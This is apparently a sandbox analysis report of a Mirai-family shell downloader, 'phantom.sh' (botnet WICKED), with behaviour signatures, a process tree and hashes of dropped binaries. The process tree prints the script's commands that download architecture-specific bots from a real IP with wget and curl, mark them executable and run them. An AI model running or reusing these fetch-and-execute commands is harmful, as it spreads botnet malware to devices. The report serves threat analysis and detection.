Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    23/03/2025, 02:52

General

  • Target
    phantom.sh
  • Size
    1KB
  • MD5
    b25643d9ed071bba8af0ef060b5180bf
  • SHA1
    12c13e5c16cabcd24f9c38b750acd5be92df73ec
  • SHA256
    2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf
  • SHA512
    5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9

Malware Config

Extracted

  • Family
    mirai
  • Botnet
    WICKED

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads process memory 1 TTPs 64 IoCs

    Reads the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/phantom.sh
    /tmp/phantom.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:693
    • /usr/bin/wget
      wget http://157.245.211.199/bins/x86
      2⤵
      • Writes file to tmp directory
      PID:699
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:713
    • /bin/cat
      cat x86
      2⤵
      PID:722
    • /bin/chmod
      chmod +x dbot phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
      2⤵
      • File and Directory Permissions Modification
      PID:723
    • /tmp/dbot
      ./dbot Payload
      2⤵
      PID:724
    • /usr/bin/wget
      wget http://157.245.211.199/bins/mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:726
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:728
    • /bin/cat
      cat mips
      2⤵
      • System Network Configuration Discovery
      PID:729
    • /bin/chmod
      chmod +x dbot mips phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
      2⤵
      • File and Directory Permissions Modification
      PID:730
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      PID:731
    • /usr/bin/wget
      wget http://157.245.211.199/bins/mpsl
      2⤵
      • Writes file to tmp directory
      PID:735
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:736
    • /bin/chmod
      chmod +x dbot mips mpsl phantom.sh systemd-private-aea8e47d0cb54e3884dd508cc7badd73-systemd-timedated.service-BjAUSi x86
      2⤵
      • File and Directory Permissions Modification
      PID:738
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:739
    • /usr/bin/wget
      wget http://157.245.211.199/bins/arm
      2⤵
      • Writes file to tmp directory
      PID:785
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/arm
      2⤵
      • Writes file to tmp directory
      PID:791
    • /bin/chmod
      chmod +x arm dbot mips mpsl phantom.sh x86
      2⤵
      • File and Directory Permissions Modification
      PID:794
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:795
    • /usr/bin/wget
      wget http://157.245.211.199/bins/arm5
      2⤵
      • Writes file to tmp directory
      PID:801
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/arm5
      2⤵
      • Writes file to tmp directory
      PID:830
    • /bin/chmod
      chmod +x arm arm5 dbot mips mpsl phantom.sh x86
      2⤵
      • File and Directory Permissions Modification
      PID:832
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:833
    • /usr/bin/wget
      wget http://157.245.211.199/bins/arm6
      2⤵
      • Writes file to tmp directory
      PID:837
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:838
    • /bin/chmod
      chmod +x arm arm5 arm6 dbot mips mpsl phantom.sh x86
      2⤵
      • File and Directory Permissions Modification
      PID:840
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:841
    • /usr/bin/wget
      wget http://157.245.211.199/bins/arm7
      2⤵
      • Writes file to tmp directory
      PID:844
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/arm7
      2⤵
      • Writes file to tmp directory
      PID:846
    • /bin/chmod
      chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh x86
      2⤵
      • File and Directory Permissions Modification
      PID:848
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:849
    • /usr/bin/wget
      wget http://157.245.211.199/bins/spc
      2⤵
      • Writes file to tmp directory
      PID:852
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/spc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:854
    • /bin/chmod
      chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh spc x86
      2⤵
      • File and Directory Permissions Modification
      PID:856
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:857
    • /usr/bin/wget
      wget http://157.245.211.199/bins/m68k
      2⤵
      • Writes file to tmp directory
      PID:861
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/m68k
      2⤵
      • Writes file to tmp directory
      PID:863
    • /bin/chmod
      chmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh spc x86
      2⤵
      • File and Directory Permissions Modification
      PID:865
    • /tmp/dbot
      ./dbot Payload
      2⤵
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:866
    • /usr/bin/wget
      wget http://157.245.211.199/bins/sh4
      2⤵
      • Writes file to tmp directory
      PID:870
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:871
    • /bin/chmod
      chmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh sh4 spc x86
      2⤵
      • File and Directory Permissions Modification
      PID:873
    • /tmp/dbot
      ./dbot Payload
      2⤵
      PID:874

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/arm
    Filesize: 65KB
    MD5: c41a79699de953380428ae97410bb85f
    SHA1: 747a2e1757455604ec6ab089eeec07744b71d79c
    SHA256: 753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf
    SHA512: c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c
  • /tmp/arm5
    Filesize: 41KB
    MD5: 2b9ff651d116fd4220b9ef064edc87ed
    SHA1: 82a30aec3a92d6b9aa928c49c775bdc5c7f368a7
    SHA256: a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e
    SHA512: e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea
  • /tmp/arm6
    Filesize: 73KB
    MD5: 9b4a9ffc8981f7af2b338260b47f8ae7
    SHA1: 5558be7ec4a318c25c659764ebacdc9ca066fdcd
    SHA256: b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d
    SHA512: 80b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a
  • /tmp/arm7
    Filesize: 140KB
    MD5: a4f6cf4e6edb03734e3fd5d250dfa63b
    SHA1: 1297b2b89a27d8c3615548099cd38cbab48dc406
    SHA256: 5cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31
    SHA512: 5e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78
  • /tmp/m68k
    Filesize: 65KB
    MD5: 0a548e5e31b00bd078466d15eb16e546
    SHA1: 0203328ab86cda8492ca3ea86528c4272394e7e8
    SHA256: 3235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3
    SHA512: fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee
  • /tmp/mips
    Filesize: 82KB
    MD5: 7f3a7052000e43a7ea7b3831d3471c53
    SHA1: ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0
    SHA256: 740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27
    SHA512: a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28
  • /tmp/mpsl
    Filesize: 82KB
    MD5: d10cde406bb6e741caa075ae3eb1b59b
    SHA1: 3b8761c325ff59e67ced6151d5c0b483e7009ff0
    SHA256: 33aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275
    SHA512: d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d
  • /tmp/sh4
    Filesize: 54KB
    MD5: 1aa4143ebcf26124be79600326fd0e38
    SHA1: b166ad38f3ee4faf5876417db28aa3ab1c211cff
    SHA256: 21a3cd61d4c9043b38ac2d0afe218c89d7205855bfaa7f91a20f7872b9124e4b
    SHA512: dbe5e2027add1007806e7d500517d538c4b669c36778ba88acf4c376c1ffa33e7bce8cd6c1a33d147b5490d8ab342a0f77a15a111603faa508d0b827c86ccdd5
  • /tmp/spc
    Filesize: 65KB
    MD5: 19d915863ed88ad6cfbed0a9e91875b4
    SHA1: 2a162911ba6df6689052c4f4f215e2a509e875e6
    SHA256: 83ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba
    SHA512: b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a
  • /tmp/x86
    Filesize: 56KB
    MD5: a7b4473399ce74c911ec86fe9f3a2295
    SHA1: 16ceb93a19944b099d8da7c0f42faa92954fd8e7
    SHA256: 5064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e
    SHA512: 32031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125